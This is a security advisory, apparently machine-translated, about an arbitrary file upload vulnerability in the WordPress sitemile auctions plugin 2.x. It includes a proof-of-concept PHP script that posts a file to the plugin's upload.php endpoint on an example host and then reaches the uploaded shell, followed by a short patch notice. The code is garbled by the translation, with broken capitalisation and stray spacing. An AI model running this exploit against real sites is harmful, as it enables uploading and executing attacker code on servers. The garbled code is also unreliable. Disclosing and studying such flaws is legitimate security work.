Arbitrary File Upload Vulnerability in WordPress sitemile auctions

Release date:
Updated on:

Affected Systems:

WordPress sitemile auctions plugin 2.x

Description:

WordPress is a blog (blog, blog) engine developed using the PHP language and MySQL database. you can create your own blog on servers that support PHP and MySQL databases.

Sitemile auctions plugin for WordPress 2.0.1.3 versions earlier than WP-content/plugins/auctionplugin/upload. the PHP script allows you to upload files with any extension to the webroot folder. You can execute arbitrary PHP code by uploading malicious PHP scripts.

<* Source: Sammy forgit

Link: http://secunia.com/advisories/49497/
Http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-auctions-plugin-arbitrary-file-upload-vulnerability.html
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Sammy forgit () provides the following test methods:

Postshell. php
<? PHP

$ Uploadfile = "Lo. php ";
$ CH = curl_init ("http://www.exemple.com/wordpress/wp-content/plugins/auctionPlugin/uploadify/upload.php? Folder =/WordPress/WP-content/uploads /");
Curl_setopt ($ ch, curlopt_post, true );
Curl_setopt ($ ch, curlopt_postfields,
Array ('filedata' => "@ $ uploadfile "));
Curl_setopt ($ ch, curlopt_returntransfer, 1 );
$ Postresult = curl_exec ($ ch );
Curl_close ($ ch );
Print "$ postresult ";

?>

Shell access: http://www.exemple.com/wordpress/wp-content/uploads/lo.php
Filename: [Ctrl-u] postshell. php after executed

Lo. php
<? PHP
Phpinfo ();
?>

Suggestion:

Vendor patch:

WordPress
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://wordpress.org/

Browsing times: 56
Severity: 0 (User voting)